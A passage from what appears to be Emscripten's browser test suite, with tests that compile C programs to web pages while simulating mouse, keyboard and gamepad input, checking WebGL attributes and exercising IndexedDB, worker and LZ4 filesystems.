1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('sdl_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
self.compile_btest(['sdl_mouse.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
create_test_file('sdl_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
self.compile_btest(['sdl_mouse.c', '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
create_test_file('sdl_joystick.c', self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
self.compile_btest(['sdl_joystick.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
create_test_file('sdl_joystick.c', self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
self.compile_btest(['sdl_joystick.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
create_test_file('test_glfw_joystick.c', self.with_report_result(open(path_from_root('tests', 'test_glfw_joystick.c')).read()))
self.compile_btest(['test_glfw_joystick.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# Javascript code to check the attributes support we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will succeed when an attribute is not supported.
create_test_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl2.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-s', 'USE_SDL=2', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes desactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
self.btest('webgl_error.cpp', '0')
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT=1', '--shell-file', path_from_root('tests/preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-s', 'USE_PTHREADS=1'], ['-s', 'ENVIRONMENT=web', '-O2', '--closure', '1']]:
self.btest('emscripten_get_now.cpp', '1', args=args)
def test_write_file_in_environment_web(self):
self.btest('write_file.cpp', '0', args=['-s', 'ENVIRONMENT=web', '-Os', '--closure', '1'])
@unittest.skip('Skipping due to https://github.com/emscripten-core/emscripten/issues/2770')
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['--shell-file', path_from_root('tests', 'test_fflush.html')])
def test_file_db(self):
secret = str(time.time())
create_test_file('moar.txt', secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM=1'])
shutil.copyfile('test.html', 'second.html')
create_test_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-lidbfs.js'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-lidbfs.js'] + extra)
def test_fs_idbfs_sync_force_exit(self):
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-s', 'EXIT_RUNTIME=1', '-DFORCE_EXIT', '-lidbfs.js'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-s', 'EXIT_RUNTIME=1', '-DFORCE_EXIT', '-lidbfs.js'])
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-lidbfs.js', '-s', 'EXIT_RUNTIME=1'] + self.get_async_args()
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']''', '-lidbfs.js'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']''', '-lidbfs.js'])
def test_fs_memfs_fsync(self):
args = self.get_async_args() + ['-s', 'EXIT_RUNTIME=1']
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_memfs_fsync.c'), '1', force_c=True, args=args + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main']'''])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
create_test_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(path_from_root('tests', 'fs', 'test_workerfs_read.c'), '1', force_c=True, args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_workerfs_package(self):
create_test_file('file1.txt', 'first')
ensure_dir('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
run_process([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_lz4fs_package(self):
# generate data
ensure_dir('subdir')
create_test_file('file1.txt', '0123456789' * (1024 * 128))
open(os.path.join('subdir', 'file2.txt'), 'w').write('1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress in emcc, -s LZ4=1 tells it to tell the file packager
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
assert os.path.getsize('file1.txt') + os.path.getsize(os.path.join('subdir', 'file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'])
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'])
print(' opts+closure')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2', '--closure', '1', '-g1'])
'''# non-lz4 for comparison
try:
os.mkdir('files')
except OSError:
pass
shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
create_test_file('data.dat', ' ')
run_process([PYTHON, FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM=1'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(path_from_root('tests', 'idbstore.c'), str(stage), force_c=True, args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2'] + self.get_async_args())
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync_worker.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'TOTAL_MEMORY=80MB'] + self.get_async_args())
def test_force_exit(self):
self.btest('force_exit.c', force_c=True, expected='17', args=['-s', 'EXIT_RUNTIME=1'])
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify', '0', '--shell-file',
path_from_root('tests', 'sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
create_test_file('sdl_gl_read.c', self.with_report_result(open(path_from_root('tests', 'sdl_gl_read.c')).read()))
self.compile_btest(['sdl_gl_read.c', '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'USE_REGAL=1', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT=1', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
create_test_file('test_egl.c', self.with_report_result(open(path_from_root('tests', 'test_egl.c')).read()))
self.compile_btest(['-O2', 'test_egl.c', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1')
def _test_egl_width_height_base(self, *args):
create_test_file('test_egl_width_height.c', self.with_report_result(open(path_from_root('tests', 'test_egl_width_height.c')).read()))
self.compile_btest(['-O2', 'test_egl_width_height.c', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD=1')
@requires_graphics_hardware
def test_egl_createcontext_error(self):
self.btest('test_egl_createcontext_error.c', '1', args=['-lEGL', '-lGL'])
def do_test_worker(self, args=[]):
# Test running in a web worker
create_test_file('file.dat', 'data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
html_file.close()
for file_data in [1, 0]:
cmd = [PYTHON, EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else []) + args
print(cmd)
subprocess.check_call(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello%20from%20worker,%20and%20:' + ('data%20for%20w' if file_data else '') + ':')
def test_worker(self):
self.do_test_worker()
self.assertContained('you should not see this text when in a worker!', run_js('worker.js')) # code should run standalone too
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. path_from_root('tests', 'hello_world_gles.c')
